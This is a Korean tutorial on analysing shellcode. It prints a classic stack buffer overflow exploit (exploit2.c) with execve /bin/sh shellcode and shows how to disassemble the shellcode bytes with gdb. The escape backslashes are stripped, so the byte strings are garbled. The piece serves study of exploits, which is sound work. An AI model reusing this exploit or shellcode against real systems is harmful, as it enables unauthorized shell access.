이 글은 oprix가 쓴 겁니다. 출처와 글쓴이를 같이 적으시면 어느 곳에서나 사용하셔도 됩니다.

쉘코드 분석

버퍼 오버플로우가 많은 해킹에서 쓰이고 있습니다. 그런데 정작 프로그램 소스를 얻었어도 쉘코드 부분은 어떤 역할을 하는지 잘 모를 겁니다. 기계어로 쓰여져 있기 때문에 알수가 없지요. 여기서는 역으로 쉘코드 소스까지 알리지는 못하고 어셈블러 수준까지 번역해주는 방법을 적었습니다. 

예를 들어 이런 프로그램이 있을 경우


/* exploit2.c */
#include < stdlib.h >
#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89"
  "x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"
  "xcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";
      
unsigned long get_sp(void) {
             __asm__("movl %esp,%eax");
}
      
int main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;
                  
  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.

n");
          exit(0);
    }
  addr = get_sp() - offset;
  printf("Using address: 0x%xn", addr);
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;
  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
  buff[bsize - 1] = '';
  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}

exploit 소스에서 shellcode 부분을 문자열로 만들어서 어셈블리어 번역을 시키는 방법을 이용하면 됩니다.

/* disas.c */
int main(void)
{
__asm__("
        .string "xebx1fx5ex89x76x08x31xc0x88x46x07
         x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c
         xcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxff"
        "); /* 편의상 줄을 나누었습니다. 한줄에 코드를 다 적아야 합니다.*/
}
$ gcc disas.c -o disas
$ gdb disas
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x8048398 :       pushl  %ebp


0x8048399 < main+1>:     movl   %esp,%ebp
0x804839b < main+3>:     jmp    0x80483bc 
0x804839d < main+5>:     popl   %esi
0x804839e < main+6>:     movl   %esi,0x8(%esi)
0x80483a1 < main+9>:     xorl   %eax,%eax
0x80483a3 < main+11>:    movb   %al,0x7(%esi)
0x80483a6 < main+14>:    movl   %eax,0xc(%esi)
0x80483a9 < main+17>:    movb   $0xb,%al
0x80483ab < main+19>:    movl   %esi,%ebx
0x80483ad < main+21>:    leal   0x8(%esi),%ecx
0x80483b0 < main+24>:    leal   0xc(%esi),%edx
0x80483b3 < main+27>:    int    $0x80
0x80483b5 < main+29>:    xorl   %ebx,%ebx
0x80483b7 < main+31>:    movl   %ebx,%eax
0x80483b9 < main+33>:    incl   %eax
0x80483ba < main+34>:    int    $0x80
0x80483bc < main+36>:    call   0x804839d 
0x80483c1 < main+41>:    addb   %cl,%cl
0x80483c3 < main+43>:    ret    
(gdb) x/wx main+3
0x804839b < main+3>:     0x895e1feb


주의 사항 .strings 다음에 절대 x00이 나오면 안 됩니다. x00이 나올 시에는 x90 으로 바꾸어 주시고 결과로 나온 어셈블리어를 x00으로 내용을 계산해서 해주세요.

巳足: 한 2년 전 쯤에 ohhara 님이 amd-exploit 을 만드시면서 shellcode에 프로그램을 작동시키면 ohhara님께 메일을 보내는 shellcode를 숨겨 놓은 적이 있었습니다.^^ shellcode 분석 한번 해보세요. 물론 어셈블리어는 필수입니다.

이 글은 oprix가 쓴 겁니다. 출처(security.xmecca.com)와 글쓴이를 같이 적으시면 어느 곳에서나 사용하셔도 됩니다.